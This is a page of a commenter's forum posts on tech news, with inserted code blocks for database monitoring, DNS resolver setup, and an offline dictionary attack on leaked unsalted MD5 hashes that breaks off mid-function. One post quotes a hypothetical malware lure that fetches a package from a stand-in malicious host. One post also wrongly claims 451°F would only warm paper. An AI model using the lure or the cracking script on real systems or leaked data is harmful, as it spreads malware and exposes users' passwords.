* Posts by Crazy Operations Guy

2513 publicly visible posts • joined 29 Jun 2009

Hello Kitty hack exposes 3.3 million users' details, says infosec bod

Crazy Operations Guy

Monitor your databases people

Would it really be that hard to monitor database queries and shut off connections if it requests too many rows or performs too many requests? Such a basic bit of protection would do wonders to prevent breaches like this. No legitimate user is going to request tens of millions of rows of data over several tables, so why is doing so allowed? At best, it's a bug in the code that should be blocked and rectified anyway.
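An added example (not part of the commenter's post) of the per-session check described above, in Python. It parses constructed audit-log lines (the field layout, session ids and thresholds are all assumptions for illustration) and returns the sessions that exceeded a per-statement row limit, a per-session row budget, or a statement-count budget. A real deployment would evaluate this in the database proxy or audit pipeline and terminate the flagged connection.

```python
import re
from collections import defaultdict

# Constructed audit-log sample (not from any real database): one line per
# completed statement with the session id and the number of rows it returned.
SAMPLE_LOG = """\
2015-12-20T10:00:01 session=17 user=webapp rows=1 stmt=SELECT * FROM users WHERE id=?
2015-12-20T10:00:02 session=17 user=webapp rows=3 stmt=SELECT * FROM orders WHERE user_id=?
2015-12-20T10:00:02 session=42 user=webapp rows=250000 stmt=SELECT * FROM users
2015-12-20T10:00:03 session=7 user=webapp rows=60000 stmt=SELECT * FROM users WHERE id BETWEEN ? AND ?
2015-12-20T10:00:03 session=17 user=webapp rows=1 stmt=UPDATE users SET last_seen=? WHERE id=?
2015-12-20T10:00:04 session=7 user=webapp rows=60000 stmt=SELECT * FROM users WHERE id BETWEEN ? AND ?
2015-12-20T10:00:04 session=42 user=webapp rows=180000 stmt=SELECT * FROM orders
2015-12-20T10:00:05 session=7 user=webapp rows=60000 stmt=SELECT * FROM users WHERE id BETWEEN ? AND ?
2015-12-20T10:00:05 session=7 user=webapp rows=60000 stmt=SELECT * FROM users WHERE id BETWEEN ? AND ?
"""

LINE_RE = re.compile(r"session=(\d+) user=(\S+) rows=(\d+) stmt=(.*)$")

# Illustrative thresholds (assumptions); tune them to what the application really needs.
MAX_ROWS_PER_STMT = 100_000     # no single statement should return this many rows
MAX_ROWS_PER_SESSION = 200_000  # cumulative rows a session may pull before being cut off
MAX_STMTS_PER_SESSION = 500     # statement-count budget per session


def parse(log):
    """Yield (session_id, user, rows, statement) for every parseable line."""
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield int(m.group(1)), m.group(2), int(m.group(3)), m.group(4)


def offending_sessions(log):
    """Return {session_id: reason} for sessions that breached a budget.

    Lines after a session is flagged are ignored, mirroring a proxy that
    drops the connection at the first breach.
    """
    rows_total = defaultdict(int)
    stmt_count = defaultdict(int)
    flagged = {}
    for sid, user, rows, stmt in parse(log):
        if sid in flagged:
            continue
        rows_total[sid] += rows
        stmt_count[sid] += 1
        if rows > MAX_ROWS_PER_STMT:
            flagged[sid] = f"user {user}: single statement returned {rows} rows: {stmt}"
        elif rows_total[sid] > MAX_ROWS_PER_SESSION:
            flagged[sid] = (f"user {user}: session total {rows_total[sid]} rows "
                            f"over {stmt_count[sid]} statements")
        elif stmt_count[sid] > MAX_STMTS_PER_SESSION:
            flagged[sid] = f"user {user}: {stmt_count[sid]} statements in one session"
    return flagged


if __name__ == "__main__":
    for sid, reason in offending_sessions(SAMPLE_LOG).items():
        print(f"cut off session {sid}: {reason}")
```

Session 42 trips the per-statement limit on its first full-table SELECT; session 7 stays under it on every statement but blows the per-session budget by paging through the whole table in chunks, which is the pattern a naive per-query limit misses. Legitimate batch jobs (reports, backups, ETL) will trip rules like this, so scope them to the application's own service account and exempt the batch roles: a bulk SELECT from the web app's account is the signal.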

Security sweep firm links botnet infestation and file sharing

Crazy Operations Guy

Re: Wait

Goes back much further, even to the very early days of malware when people would insert pranks into disks that would be copied and distributed. See Elk Cloner for an example (https://en.wikipedia.org/wiki/Elk_Cloner)

New HTTP error code 451 to signal censorship

Crazy Operations Guy

IETF were not persuaded it was a good use of a limited number of status codes

Yeah and "418 - I'm a Teapot" was such a great use... Besides, would this already be covered under a couple other codes? Error 403 springs to mind or even 410.

But that ignores the fact that most censorship is going to happen on the wire anyway, so either error 404 or a connection timeout would result. For most currently censored things, the protocol seems to be to use a redirect to a page describing why and who is censoring the data, something much more helpful than a cryptic error code.

Crazy Operations Guy

"451 degrees Fahrenheit being the auto-ignition temperature for paper"

No, that would be 451 degrees Celsius, 451 degrees Fahrenheit would just make the paper fairly warm. The source Ray Bradbury called confused the two units and the mistake wasn't caught until well after publication.

New bill would require public companies to disclose cybersecurity credentials

Crazy Operations Guy

Cue new certification being created

And now, I'm sure that one of the certification companies is going to come out with a special certification for 'Cyber-security Awareness' so that board members can claim they have cyber security experience and can spout off enough buzzwords to fool investment bankers.

Much like all the Six-sigma certifications that I see incompetent upper management types bandy about.

Let's shut down the internet: Republicans vacate their mind bowels

Crazy Operations Guy

Re: He's not completely wrong

ISIS has billions of dollars sitting around, I would think that there're at least a few ISPs / TelCo's that are unscrupulous enough to give them a connection. Orascom (an Egyptian company) provide cell services to the North Korean government and they happen to have fiber in Syria, I'm pretty sure that they wouldn't have any qualms about letting ISIS use their links.

As for Satellite links, ISIS has been known to create fake non-profits and charities and I wouldn't put it past them to use one to purchase a bunch of Sat Phones and internet subscriptions.

Crazy Operations Guy

Re: He's not completely wrong

Yeah, except the vast majority of ISIS's infrastructure is hosted elsewhere in the world. Shutting down the internet in the territory that they control wouldn't hurt them much, if at all. They have enough infrastructure within their territory to continue communicating within their borders. Plus the cell phone companies out there already have a pretty extensive network of microwave nodes, so cell service can continue even if they are cut off from the rest of the world (which wouldn't be that difficult to re-connect over satellite or some other system anyway).

Crazy Operations Guy

Re: Conservative = stupid

I think it's more:

Conservative: "Life is good for me, I don't want that to change"

Liberal: "Life sucks, let's try something new to see if it works"

Cisco forgot to install two LEDs in routers

Crazy Operations Guy

Re: My Chinese assembly shop contractor ...

I'm assuming that the problem is automated manufacturing. The boards were very likely populated by a pick and place machine, moved to soldering by conveyor belt, then tested with an automated bed-of-nails. Since those tests would've passed, the board would've been pushed to assembly and screwed into the case by assembly line workers who neither know nor care about what they are putting together, regardless of nationality.

The problem likely stemmed from an electrical engineer cleaning up the gerber file from the approved prototype and accidentally cutting the two LEDs and forgetting to paste them; accidentally moving them off of the board; or maybe deleting them along with the added programming and testing points / LEDs that were on the prototype the production model was based on (I would believe that the testing folk would use port 8's LEDs to indicate specific test conditions, and they ended up marked as such and were removed when going to production). I've done such things on my own private projects when I'm going over the schematics several times and not under a single deadline; someone working 50+ hours a week could easily make these kinds of mistakes late Friday night before the boards go into production.

But what bothers me is that Cisco isn't using ports with built-in LEDs like everyone else does, especially since external LEDs cost more in terms of both engineering and manufacturing.

Crazy Operations Guy

Re: " most admins aren't going to be looking at the device for confirmation that it's working"

Except when you plug it in initially. When you're looking at a network rack or in a networking closet, are you going to be staring at your monitoring software, or the port you just plugged a cable into? Besides, most of the time the physical cabling is done by a low-level technician and the actual software side of things is done by a different person / group who are waiting on word from that technician that the cable is plugged in and working. And given that this is port 8 of a block of interfaces, I'd imagine that there've been several cable monkeys wasting hours of time trying to figure out why the other seven ports seem to be working but that one does not.

Crazy Operations Guy

Re: "why the quiet "L" in the American use"

Why the extra 'u' in words that end in 'or'?

Are second-hand MoD IPv4 addresses being used in invoice scams?

Crazy Operations Guy

Re: Hamachi

I always hate it when folk use real IP ranges for stuff like that. I can't count the number of times I've seen networks melt down because someone decided to use the 1.x.x.x network space or some other IP range that wasn't assigned to them. The RFC 1918 space is more than big enough, people (a /8, a /12, and a /16, or 17 million addresses); pick something in there and use it...
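An added check (not from the commenter) for the point above: given the prefixes someone proposes to carve out for internal use, flag any that fall outside the three RFC 1918 blocks. The proposed list is constructed for illustration; 1.0.0.0/8 is the example from the post and 172.32.0.0/16 is the common off-by-one that lands just outside 172.16.0.0/12.

```python
import ipaddress

# The three RFC 1918 blocks: 10/8, 172.16/12, 192.168/16.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(prefix):
    """True if the whole prefix lies inside one RFC 1918 block."""
    net = ipaddress.ip_network(prefix, strict=False)
    # subnet_of() raises on mixed IPv4/IPv6, so guard on the version first.
    return any(net.version == block.version and net.subnet_of(block)
               for block in RFC1918)


def audit_prefixes(prefixes):
    """Return the prefixes that are NOT private and so collide with someone's public space."""
    return [p for p in prefixes if not is_rfc1918(p)]


def private_address_count():
    """Total addresses across the three blocks (the post's 'about 17 million')."""
    return sum(block.num_addresses for block in RFC1918)


# Constructed list of ranges a team might propose for an internal network.
PROPOSED = ["10.20.0.0/16", "1.0.0.0/8", "172.32.0.0/16", "192.168.1.0/24"]

if __name__ == "__main__":
    print("private addresses available:", private_address_count())
    for bad in audit_prefixes(PROPOSED):
        print("not RFC 1918, do not use:", bad)
```

Run this over the address plan before anyone types it into a router: the two prefixes it rejects above are exactly the ones that will break the moment a host needs to reach the real owner of that space.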

Microsoft releases Windows Live Writer as open source

Crazy Operations Guy

And with a rational license too...

What the hell has happened at Microsoft? With the new Linux Cert and now releasing old code with a rational license...

Maybe now that Bill and the Chair-tossing monkey have left, rationality is breaking out.

NZ unfurls proposed new flag

Crazy Operations Guy

If anyone needs a new flag, it's Poland

Poland's flag is exactly the same as Indonesia's or a flipped over version of Monaco's.

WordPress hosting biz confesses to breach, urgently contacts 30,000 users

Crazy Operations Guy

Re: Ahem..

And now companies will turn off all their logging functions so that everything they do is proactive...

Crazy Operations Guy

"Apparently the company's "best-in-class" technology is used across 120 countries."

Being the best WordPress host is like being the best piece of shit in a septic tank...

From what I've seen of WordPress systems, it's 99% crap code hosting 99% crap opinions and information.

Eurocrats deserve to watch domestic telly EU-wide, say Eurocrats

Crazy Operations Guy

Re: Or the better way

$12 a month for iPlayer is much, much cheaper than paying my cable provider to push the BBC down to my television...

But what I envisioned would be for all television channels to cooperate with this internet-broadcast company so you'd buy multiple shows during the billing period and pay at the end of the month. Payment could then be handled by someone like Paypal who already have experience in global micro-transactions.

One of my main motivations is that since I'm paying for groups of channels right now, I want the networks to know that I want my money to go to shows I like rather than the crap talk shows and political scream-fests that also happen to be on the same channel (and would thus get a piece of that pie). Or to kill the practice where all shows go on hiatus at the same time, since I'm still paying for the channel despite a complete lack of anything new that I'd want to watch.

Crazy Operations Guy

Re: "You've just reinvented the DVD ( / bluray / VHS )"

Except in this case I can get a copy of Doctor Who as it airs, rather than waiting a couple weeks while the local BBC affiliate catches up (Which, annoyingly, I have to pay close to $120/month to get since it only comes with the International Favorites HD package and Premium Cable as well as rent the appropriate HD receiver through my cable provider)

Crazy Operations Guy

Or the better way

The better way to do this is to simply mandate that if someone pays for a piece of media, they can watch it wherever the hell they want. I'd be more than willing to send the BBC a couple pictures of some dead presidents each month for access to iPlayer.

What would be the problem with just determining how much it cost to produce a piece of media, then divide that by the number of people consuming it, then charging the viewers that much to watch said piece of media (plus a reasonable extra bit for profit)?

In the modern era, couldn't we just switch television viewing to a purely pay-per-view like model where you purchase a piece of media based on the production cost and the number of other viewers (and allowing for people to watch advertisements to reduce the amount they would have to pay)? However, once you purchase that piece of media, you can watch it however and whenever you want. There would be so many benefits for everyone involved, especially for the producers as they would get highly detailed rating information rather than trying to rely on Nielsen ratings and months-old data from the cable providers.

I figure that a system where you'd request the media 24 hours in advance and the production company can only charge enough to repay the production cost, but anyone buying a copy of that piece of media after the broadcast time is charged the same amount as everyone else, but it becomes pure profit for the company. Thus it would give the producers incentive to make good media that the people would want (Since anyone buying after the broadcast time has seen/read a review of it and is still interested in seeing it).

Mozilla confirms its Firefox OS phones are dead

Crazy Operations Guy

Re: "x.509 . Angry birds. Really?"

I was just picking a popular and well-known app that behaves similar to your typical flash game and would be trivial to port over to HTML5.

Crazy Operations Guy

Allow the apps to run in both mobile and desktop

I figure they could've gotten a decent edge by running a cloud to host every app so that the app could be run in both the desktop browser as well as on the mobile device. They could even throw in a secured version of Flash so that any Flash or HTML5-based browser game can be used as an app for FirefoxOS. The phone could then just communicate with a website for the app (Add in some standard website caching to reduce the load)

For revenue, they could extend the HTML5 standard with DRM on the HTML/JS itself and an Ad-frame tag. Especially if the DRM was based on standard x.509 certificates, it'd go like this:

* User buys Angry Birds and the transaction goes through

* User's certificate would then be added to the ACL for AngryBirds.store.firefoxOS.com (or some other URL scheme)

* User can now go to the site and play / use the app they bought

Such a scheme could also allow a user to authenticate against anything without ever needing a password beyond setting a password on the phone (Which can be the same as their master password for their regular desktop firefox account), they'd simply authenticate with their personal certificate to the various services. The personal certificate could also be used with other browsers and phones. This way, you can theoretically create a truly platform agnostic app store and crush the competition by way of compatibility. Hell, they could even compete on the desktop OS level at that point...

'Paedo hunter' who made £40,000 from blackmail jailed for 9 years

Crazy Operations Guy

Re: Abused becoming abusers

Abused becoming the abusers isn't all that true. The studies that showed that were flawed in their selection of study participants. Further studies have shown that there isn't a statistically significant increase in the percentage of child abusers in the formerly abused community vs the community at large. Those with the inclination to abuse children come from every walk of life imaginable, which makes it very hard to actually find the abusers and get proper justice (since the police, and the justice system, are operating on a lot of stereotypes). The organization I volunteer with supports abuse victims and we'll do a quick survey of their situation to figure the best course of action, and we've gotten reports of abuse by the rich and poor, men and women, unemployed and professionals, and from every race. Hell, we had one case where it was a housewife sexually humiliating her teenage son; she was later caught and interviewed, which produced no evidence that she was ever abused in any way, and she grew up in a very healthy and supportive household.

Crazy Operations Guy

Re: "Does not apply in the UK - all they need to prove is possession,"

Well, that certainly explains why the US created the Bill of Rights and put in some bits to prevent that when splitting away from British rule. Although I would've assumed that something would have been enacted in the last 250 years to cover that gap... The concept that the police can dump incriminating evidence on you, then arrest you for it is a grave miscarriage of justice...

Crazy Operations Guy

Re: paedophilia as a mental illness

Then there are the legions of folks that have urges to do such things but are prevented from seeking treatment because psychiatrists are legally obligated to inform the police even if there is no evidence that they have, or ever will, abuse children. So if you ever even suggest that you had sexual thoughts about a minor to a doctor, even in private and protected sessions, welcome to the Sex Offender registry and a life of everyone avoiding you and thinking that you lure kids to your sex dungeon with candy and a windowless van. But you can tell your psychiatrist that you have these urges to kill people in horrible and disgusting ways, and they legally cannot say a thing unless they fully believe that someone's life is in danger.

I know this because I work for an organization that works to prevent child abuse and to help victims. We've interviewed several abusers (Studying methods that can be used to prevent people from becoming abusers in the first place) and found that they ran into that exact problem and while attempting to find a support group, they found chat rooms full of people telling them how to get away with it and encouraged them to go through with their sick desires (or at least didn't discourage them).

This will never change because who would want to be known as the defender of child molesters?

Crazy Operations Guy

Indeed, but I suppose that would be where he got the photos and the videos. From my experience dealing with fraud, I would imagine that the targets would want verification photos/video to prevent this exact thing from happening (e.g. have the child write a specific phrase on their arm and show it on video).

Crazy Operations Guy

"The police and CPS *never* ask how the pictures got there"

Yeah, but any defense counsel certainly would (and is legally required to do so). There are countless times when a case gets thrown out because the defense simply asks "How did you get that piece of evidence?". Even the most innocent and trivial violation of the chain-of-custody can cause evidence to be thrown out. In this case, the defense could simply argue that the police planted that evidence, and without evidence proving that they didn't, the evidence can be thrown right out the window before making it to trial (This 'paedo hunter' could have been working for the police).

At least this is how it works in the United States (Or at least supposed to if the prosecutors didn't abuse the whole plea-bargaining system and public defenders weren't screwed over so badly).

Netherlands votes to splash cash on encryption projects

Crazy Operations Guy

I love it when countries understand how to properly decrypt something

The Netherlands and the rest of Scandinavia / Bavaria all seem to understand the best way of getting at encrypted data: acquire a warrant from a legitimate judge, present said warrant to the owner of the encryption key and give them the opportunity to challenge the warrant (or to later challenge the evidence gathered by the warrant before going to trial).

Interesting how the countries that don't treat every citizen or refugee like terrorists have the fewest terrorism-related attacks.

Crazy Operations Guy

The projects they are funding are already open source and you are already using them. The money is earmarked for code improvements and ensuring that there aren't any bugs rattling around (such as Heartbleed or Poodle). These projects aren't trying to create new algorithms, merely ensuring that existing algorithms are implemented safely.

Internet's root servers take hit in DDoS attack

Crazy Operations Guy

Add more root servers

I figure that they can put out a regulation where if you want to run a TLD, you also have to host a root server (and have it verifiable through DNSSEC that you haven't tampered with the root zone file). I figure that if you want a piece of the internet, you should be required to also support the rest of it.

It's not like the root zone is really all that expensive to host anyway. It's a simple 1.1 MB file and it only sees a few queries anyway (the zone only contains NS records for the various TLDs out there, and each has a TTL of either 24 or 144 hours), so any client DNS server would only create, at most, 1.1 MB worth of queries every 1-6 days (and that's assuming that that DNS server is trying to find names in every single TLD out there). And the fact that they are distributed would only reduce that load even further.

It bothers me that so much of the Internet's basic infrastructure is hosted in a single country that hasn't really shown that it should be trusted with such things. Every country hosting a root DNS server would then add a bit of accountability to world governments.

In my opinion, we should really move to a distributed DNS type system where a DNS server operator can host the zone files for as much of the internet as they want, with each zone being distributed in a signed torrent/diff-file like system. Changes would be signed by the Authority for each particular TLD (and the root would be authorized by ICANN). Such a system wouldn't need that much engineering to put together. It'd take a while to get it fully implemented, but the benefits would be more than worth it.

A copy of all zone records would be less than 100 GB (just guessing based off of an estimate that an NS record and an A record for each domain would be about 128 Bytes, and .com has 122 Million such domain pairs for 14.5 GB for .com, and assuming that .com takes up less than 10% of all domains). Even if all 1172 domains were the size of .com, that'd only be 16.6 TB of DNS data total, so with current storage technology, a DNS server hosting every single 2nd level DNS record in the world would cost only a few thousand dollars in the worst case.

Battery-free IoT sensor feeds off radio waves

Crazy Operations Guy

It still needs power

I've never liked the whole 'harvest power from radio waves' idea since you still need to produce the power anyway and converting it to/from radio waves is ridiculously inefficient (Not to mention the interference caused by bumping the power up). Wouldn't it just be easier to use a layer of conductive paint and harvest energy by way of micro pulses? I figure that you'd place these along the top/bottom edge of the wall or in corners, so a thin strip of paint is all that would be needed. You could even base it off the 1-wire bus standard so that the conductive strip also transfers the information.

Nokia, ARM, Enea craft new TCP/IP stack for the cloud

Crazy Operations Guy

Re: TCP Offload?

The problem being that NICs tend to have access to memory at a very low level. A single bug in the code could allow a user-space application to grab sensitive data out of the kernel since the lowest levels of the code have to run in kernel space anyway (IRQ handling, device initialization, IPSEC, authentication, etc).

Really, the risk here is exposing sensitive interfaces to user-mode applications.

Pirate Bay domain suspended thanks to controversial verification system

Crazy Operations Guy

Re: Heartless B*stards

The problem is that if they acquiesce to one request to take down a torrent (Which someone could just put right back up a few seconds later), it would set a precedent where they are now open to remove anything that anyone finds offensive. Sure, no one will find a problem with releasing autopsy files of children, but where do you stop? Would you want them to take down photo collections of children being starved to death during the holocaust? What about starving children in Africa? Or photos of ISIS's atrocities? All of those things are quite repugnant and no one wants to see them, but they need to be seen. With the files of those children, what if the files indicated that the children were abused or someone happened to know something missing from the investigation that could prove the suspect's innocence?

Besides, with the way the torrent protocol works, they'd have to hire an army of staff members to download every single torrent, look through the included files, and cross reference them with every single complaint ever brought to them, just to make sure that the content stays down.

Crazy Operations Guy

Re: OpenNIC

Rather than setting any specific DNS servers, I just set up a VM on my network running unbound configured to use only the root hints and to verify with DNSSEC. Pretty easy to do and no risk of the ISP interfering with my queries (especially not trying to redirect to an advertising page when attempting to resolve a bad address).
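An added unbound configuration (not the commenter's own config) for the setup described above: a validating resolver that walks from the root hints itself rather than forwarding to the ISP, with DNSSEC validation switched on. The file paths, listening address and allowed client range are assumptions.

```conf
server:
    # Listen on the LAN side only and answer only local clients (assumed addresses).
    interface: 192.168.1.53
    access-control: 192.168.1.0/24 allow
    access-control: 0.0.0.0/0 refuse

    # Start every lookup from the root servers instead of an ISP forwarder.
    root-hints: "/etc/unbound/root.hints"

    # DNSSEC validation; the key file is created and kept current by unbound-anchor.
    auto-trust-anchor-file: "/var/lib/unbound/root.key"
    val-permissive-mode: no
    harden-dnssec-stripped: yes
    harden-glue: yes
    harden-referral-path: yes
    qname-minimisation: yes

    hide-identity: yes
    hide-version: yes

# Deliberately absent: a forward-zone for "." pointing at the ISP's resolver.
# That forwarder is where NXDOMAIN gets rewritten into an advertising page.
```

Fetch the hints file from https://www.internic.net/domain/named.root, create the trust anchor with `unbound-anchor -a /var/lib/unbound/root.key`, and run `unbound-checkconf` before starting the daemon. To confirm validation is actually happening, `unbound-host -C /etc/unbound/unbound.conf -v example.com` should report the answer as "(secure)", and a deliberately broken test domain such as dnssec-failed.org should come back SERVFAIL rather than with an answer.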

Crazy Operations Guy

I registered a domain name about 15 years ago now, and not once have I been asked to verify it, although the domain has never had any web content on it (well, other than a single file containing only "<html></html>"). I am still receiving email on that address and DNS queries are still coming in for other resources (I host DNS and some other services out of the domain).

Adobe's Flash tools now embrace HTML 5. Sadly Flash is still alive

Crazy Operations Guy

Re: Flash is more than just ads ya know.

I would think that they'd just use standard animation software to make their cartoons like a real animator would.

Using something like Flash for animation is like trying to nail two boards together by setting a nail on the floor point-up and then slamming the two pieces of wood down on to it.

Bad wind halts space station resupply mission

Crazy Operations Guy

Why Android?

Why would you use Android for a communications satellite? The closest thing to Android it should have would be a Linux-powered management system and a couple cores running a proper RTOS (or even just microcontrollers running through closed loops).

These things are supposed to be routing packets, not playing Angry Birds...

Oh em gee – Adobe kills Flash Professional (it's called Animate now)

Crazy Operations Guy

> have they always had the privileged access to these APIs that this would require?

I'm thinking that its more of the reverse, that they have always used the undocumented stuff, then find out that it doesn't work anymore, then whine and complain to Microsoft until they put the old calls back in. Adobe does have a massive install base (Wouldn't want to alienate several million potential users), so they have quite a lot of leverage with Microsoft and Apple as far as software is concerned and would thus be able to pry the secrets of fast (and insecure) performance from them. Mostly to keep out the competitors who only have access to the publicly documented stuff, I would assume.

This is starting to change with HTML5 becoming more and more popular, but they'll still have everyone by the dangly bits until we completely move away from Flash and PDFs (as well as finding a good replacement for their photo and video editing suites, but since it's a niche, it's not quite as important as Flash and Reader).

> And if *that's* true, then how come practically all their software runs like complete turd after the first 10 minutes (max)?

Because a lot of the OS's garbage collecting and caching systems work much better with the standard, documented calls using data structures that they understand; with the undocumented calls, the GC and optimization stuff gets confused and stuff goes wrong.

Crazy Operations Guy

Indeed, other than a few added features, the Windows APIs have remained virtually untouched. Other than the new "App" subsystems, nothing really changed that between 7 and 8 (architecturally speaking). Signed drivers compiled for 7 will run just fine under 8, 8.1 or even 10 (and their associated server versions). And with the security improvements made, its far more likely that a product would run under 7 but not anything later...

I suspect that Adobe is really just dependent on undocumented and unsupported API calls that are intended only for internal OS components.

Samsung's mobile chief gets shunted aside for software guy

Crazy Operations Guy

Re: Premium

"vanilla android also means less costs for a phone vendor."

Yeah, but it also means less profit. They include those particular apps to drive folks to their other products, or a partner's product, and make money from that. In other cases, they'll make modifications so that people associate the brand with more than the writing above the screen; it's hard to establish brand loyalty when there is no discernible difference between your brand and a cheap phone from a competitor like Huawei.

As for patches, that is the problem with the TelCo, not the phone manufacturer. The TelCo will customize the phone even further, making it nearly impossible for the handset manufacturer to make a proper patch available, so they'll make the source changes, send the diffs down to the TelCo and let them merge and compile the patch to be sent out. But even then, the TelCo will drag its heels as much as possible when it comes to patching bugs that don't prevent the phone from connecting to their network and generating billable activity, especially since patching the phone may cause the phone to fail (which means both lost revenue while the phone doesn't work, plus the cost of a warranty repair as they were the ones that broke it). Plus, how else are they going to convince someone to upgrade ("We can update your old, obsolete phone to fix its bugs, or you can buy this shiny new phone with better battery life and better reliability for only $20 a month!")

Can't get a break: Pwned Linux ransomware pwned again, infects 3000

Crazy Operations Guy

Re: "Downloading a random executables from an untrusted ... source just isn't done."

I'd agree when it comes to power-users and other folk who understand what is happening behind the scenes, but as the great unwashed start using it, that'll change fairly quickly.

More and more, I see newbies pop up onto forums asking about a specific piece of software or hardware working and are then directed to install a package off a personal or obscure repository, I don't think it'd be too long (if it hasn't happened already) that someone will post a link to a repository hosting compromised software.

I figure that you could probably get a lot of people to install your malware if you advertise it as something like "Candy Crush for Linux! Just run 'doas apt-get http://malicious.domain.ru/repos/...'. ignore the encryption error since this is my personal repository and I just finished this". Hell, they could cover their tracks by just bundling in an Android Emulator so it works, but does nasty things in the background.

But what worries me the most is the proliferation of systemd and the philosophy that goes with it ('Don't worry, the OS will take care of it, nothing for you to see here, just an obfuscated database and API'); it's big and bloated enough that there are many, many little spots to hide malware and other assorted nasties, although one might argue that systemd is, in itself, a piece of malware...

If a picture tells a 1000 words about latency, Google won't load it

Crazy Operations Guy

"India can now access Internet.org's Free Basics un-metered subset of the web."

So I'm guessing that you'd normally get just a bunch of local, mass-appeal type websites, but then have to subscribe to the 'Sports Package' to see football scores (subscribe soon to Sports Plus to get Cricket Scores and save up to 10% on your next bill!).

It seems that Google's / Facebook's plan is to set a precedent for lack of net neutrality so that as high-speed connections are rolled out, no one would notice until it's far too late. Much like how the cable / DSL companies managed to get regional monopolies established in the US.

Hate your broadband ISP? Simply tell your city to build one – that'll get the telcos' attention

Crazy Operations Guy

Internet access as a utility

I think that internet access has gotten to the point where it's almost a necessity like electricity and water. In which case, I think municipalities should be taking over more and more, or at least offering an alternative to the commercial ISPs (in the same spirit as being able to hire a taxi, or use one of the public buses).

RSI Videofied is a 101 in how to build IP CCTV and alarms with zero security, zero encryption

Crazy Operations Guy
Joke

They knew how to build a GUI in Visual Basic and trace the IP addresses of the feds.

Your browser history, IP addresses, online purchases etc all up for grabs without a warrant

Crazy Operations Guy

Re: The Rules

Yep, amendments 4 and 6 to The Constitution, a bit of the 5th as well. The Supreme Court theoretically has the ability to disband and overturn all the decisions of the Secret Court, but they'd need someone to bring such a case to them first (Which is monumentally hard to do since a single denied appeal at any previous level kills that chance, and given that the records are sealed, it is nearly impossible to prove that the secret courts are, in fact, violating the constitution, so no grounds for appeal in the first place)

VPN users menaced by port forwarding blunder

Crazy Operations Guy

The risk with shared systems

This is the problem with shared systems, they are only as secure as the other people using it. Of course the solution here would be to build out a massive number of tiny VPN servers and only allow a dozen sessions or so through it rather than very large boxes with thousands of sessions. A tuned linux kernel, a couple libraries, and a VPN daemon would fit in a tiny amount of resources (a single core box with 128 MB of RAM and 8 GB of storage would be more than enough)

Walmart spied on workers' Tweets, blogs before protests

Crazy Operations Guy

Re: just out of curiosity

I'm sure that the contracts people signed when they agreed to work at Walmart included provisions to allow an outside company to perform investigations on behalf of Walmart, so handing over an employee list would be perfectly legal. But that wouldn't even be necessary, since the protesters would be motivated to make the pages for coordinating the protest as accessible as possible (to get as many people to participate as possible). It's likely that these protests were organized via a Facebook group or some kind of twitter thread in which the protesters used their real names and probably have 'Employer: Walmart' on their profile pages, so LM would be providing a list of people protesting to Walmart (who would compare it to their employee list, thus side-stepping any possible legal issues with giving that list to a 3rd party).

Or, possibly, LM employees posed as fellow Walmart employees / interested members of the public and joined the various groups (finding the groups by way of a google search for 'Walmart protest'). It's not like the protesters would be doing much in the way of background checks to prevent any adversary from gathering intel on them.

Crazy Operations Guy

Re: How about...

Oh right, because minimum wage workers were the ones who decided to move the factories overseas...

Crazy Operations Guy

Re: Got enough money to hire Lockheed Martin

And that would be the problem with publicly traded companies. Half the problem is that the people on the boards that are only interested in pumping the stock price by any means necessary, including lowering employee wages as low as possible (pretty much determined by lowering wages until you run into a labor shortage, or hit the minimum wage). The other half is the owners / executives that look the other way in exchange for massive paychecks (which usually end up being in the form of stock, providing a further incentive to pump stock prices). Especially to blame is the so-called 'activists investors' whose sole objective is to raise stock prices short-term and dump the stock once it hits a certain level and then moving onto the next company without even looking back to see the damage they've done.

So with this situation, you end up with a company that only exists to make money for a select few who give just enough benefits to its employees to keep them from quitting and making products that are barely keeping customers satisfied.

Final countdown – NSA says it really will end blanket phone spying on US citizens this Sunday

Crazy Operations Guy

"remain in NSA archives until February 29"

Had to check to make sure there actually will be a February 29th next year. I wouldn't have been surprised to find that they were trying to pull a fast one on us and never delete the information: "We said we will delete it all on 29 Feb 2016, but since that day never came..."

Millions of families hit in toymaker VTech hack – including 200,000+ kids

Crazy Operations Guy

I would assume that an attacker would do it the other way around, where a bunch of passwords are taken from a dictionary or brute-force algorithm, run through an MD5 hash, and the results compared to the list of stolen passwords. A modern GPU could burn through about 2 Billion passwords per second (a report found that an nVidia 8800 Ultra could do 200 million per second with approx 576 GFlops of computational power; its modern equivalent, the GeForce Titan X, has about 6100 GFlops of oomph), so going through the most common passwords and most of the English language would probably take an afternoon; throw a botnet / AWS at the problem and you could burn through a significant part of the possible table space in a couple days.

Of course this assumes that you don't already have a bunch of rainbow tables sitting around already.
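An added Python illustration (not the commenter's code) of the offline attack described in the post above: hash dictionary candidates, with a few mangling rules, and look each digest up in the leaked table. The "leaked" digests and the wordlist are constructed inline so the block runs offline; in a real case the digests come from the dump. The last function shows why a per-user salt removes the shared precomputation (rainbow table) shortcut, though salted MD5 is still far too fast to be a password hash: a real password store should use a deliberately slow function such as bcrypt, scrypt or Argon2.

```python
import hashlib
import secrets


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


# Constructed stand-in for a leaked table of unsalted MD5 digests, keyed by
# digest with the account name as the value. Derived here from four chosen
# passwords purely so the example can run offline.
_SIMULATED_PASSWORDS = ["password1", "Letmein123", "kitty2015!",
                        "correct horse battery staple"]
LEAKED = {md5_hex(p): f"user{i}" for i, p in enumerate(_SIMULATED_PASSWORDS)}

# Constructed wordlist; a real run uses previously leaked passwords plus a dictionary.
WORDLIST = ["123456", "password", "letmein", "kitty", "dragon", "monkey"]
SUFFIXES = ["", "1", "123", "2015", "2015!", "!"]


def candidates(word):
    """Cheap mangling rules: three case variants x common suffixes."""
    for base in (word, word.capitalize(), word.upper()):
        for suffix in SUFFIXES:
            yield base + suffix


def dictionary_attack(leaked, wordlist):
    """Return {digest: plaintext} for every leaked digest a candidate matches.

    With unsalted hashes one MD5 per candidate covers every account at once:
    identical passwords produce identical digests, so a single lookup
    cracks all of them.
    """
    found = {}
    for word in wordlist:
        for cand in candidates(word):
            digest = md5_hex(cand)
            if digest in leaked and digest not in found:
                found[digest] = cand
    return found


def seconds_to_exhaust(charset_size, length, hashes_per_second):
    """Worst-case time to brute-force one unsalted hash of the given shape."""
    return charset_size ** length / hashes_per_second


def salted_md5(password, salt=None):
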